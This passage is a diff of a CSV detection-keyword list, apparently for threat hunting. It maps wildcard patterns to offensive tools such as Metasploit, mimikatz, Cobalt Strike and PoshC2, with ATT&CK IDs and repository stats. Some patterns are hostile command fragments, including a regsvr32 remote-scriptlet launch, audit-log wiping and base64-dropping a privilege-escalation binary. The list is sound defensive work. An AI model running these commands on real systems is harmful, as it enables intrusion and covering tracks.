TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*_lfi_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*_lsass.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*_lsassdecrypt.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*_mouse_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*_msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*_msfvenom*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*_nimplant_*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*_mouse_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_msfvenom*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_nimplant_*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*_peloader.dll*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*_posh-common*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*_posh-common*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
"*_prefix_PEzor_*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*_pycobalt_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 
- TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*_Shellcode.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*_Shellcode.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*_tcp_cc2(*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*_udp_cc2(*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*{process_to_inject}.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*{process_to_inject}.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" "*| favfreak*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*| hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*|base64 -d > /tmp/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*| hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*|base64 -d > /tmp/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*~/.csexec*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*< /dev/console | uudecode && uncompress*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" -"*<3 eo.oe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*<3 eo.oe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "**","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" -"*== NoPowerShell v* ==*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*== NoPowerShell v* ==*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*=== GENERATING MALICIOUS GROUP POLICY TEMPLATE ===*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*=Administrator.ccache*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" "*=imaohw*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed whoami","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*=MSEXCEL*regsvr32 /s /n /u /i:http*/SCTLauncher.sct scrobj.dll*","offensive_tool_keyword","pacu","The AWS 
exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*=resu ten*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*> /var/log/audit/audit.log* rm -f .*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*0.0.0.0:2222*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*0.0.0.0:4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*0.0.0.0:4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*0.0.0.0:4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*0.0.0.0:4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 
